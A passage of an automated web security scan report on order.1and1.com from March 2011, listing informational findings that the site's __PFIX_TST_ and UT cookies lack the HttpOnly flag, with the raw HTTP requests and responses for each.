Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:50 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=73692ad413d39c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureControlCenter;jsessionid=1B51466ABA469A1856198D8F289AA6ED.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.24. http://order.1and1.com/xml/order/FeatureDatabaseAccess

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseAccess

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDatabaseAccess HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:40:21 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=39c7e664d5cb4800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseAccess;jsessionid=0EEDDFFA9977302FD804911AC8DEF8FF.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.25. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseDatabase

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UT (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:40:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:54:26 GMT; Path=/
ETag: 6a692a38f8ce7adf0db3d89ed7606ff0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17942


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.26. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseDatabase

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDatabaseDatabase HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:40:07 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=37397528d82e9400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseDatabase;jsessionid=27663FC3D5B3D61A6AFACF2EAFEA8C46.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.27. http://order.1and1.com/xml/order/FeatureDatabaseMssql

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseMssql

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDatabaseMssql HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:40:38 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=282c3b09cb862800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseMssql;jsessionid=49F80D961469395540AF07C120006E83.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.28. http://order.1and1.com/xml/order/FeatureDomainDns

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDns

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDomainDns HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:44 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2a749cb4eb8e1800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainDns;jsessionid=699406EC5243591A37F944E2D6F57ECA.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.29. http://order.1and1.com/xml/order/FeatureDomainDns

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDns

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UT (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDomainDns;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:39:50 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=XZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:53:57 GMT; Path=/
ETag: d73323ab9fa4652a9df5494f55f0fb43
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16275


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.30. http://order.1and1.com/xml/order/FeatureDomainDomains

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDomains

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDomainDomains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:11 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3b7517c1ba0d2800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainDomains;jsessionid=9570F2B6FB8AFD7FE7087C16F49B1CA1.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.31. http://order.1and1.com/xml/order/FeatureDomainDomains

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDomains

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UT (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDomainDomains;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:39:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:53:23 GMT; Path=/
ETag: 5e110134f5ab455c39b626b00d12c7cc
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 22277


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.32. http://order.1and1.com/xml/order/FeatureDomainPdr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainPdr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDomainPdr HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:18 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7a745aba1b129c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainPdr;jsessionid=C2F6A7CD01E75DD0403F9C07235AE750.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.33. http://order.1and1.com/xml/order/FeatureDomainPdr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainPdr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UT (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDomainPdr;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:39:38 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:53:45 GMT; Path=/
ETag: 6aa33937828532fc07c39d975616575c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17619


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.34. http://order.1and1.com/xml/order/FeatureDreamweaver

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDreamweaver

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDreamweaver HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:38:43 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4cdcf90faf576c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDreamweaver;jsessionid=905B724B7FF56930CBD8DE2F89703E4D.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.35. http://order.1and1.com/xml/order/FeatureDreamweaver

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDreamweaver

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UT (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:39:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
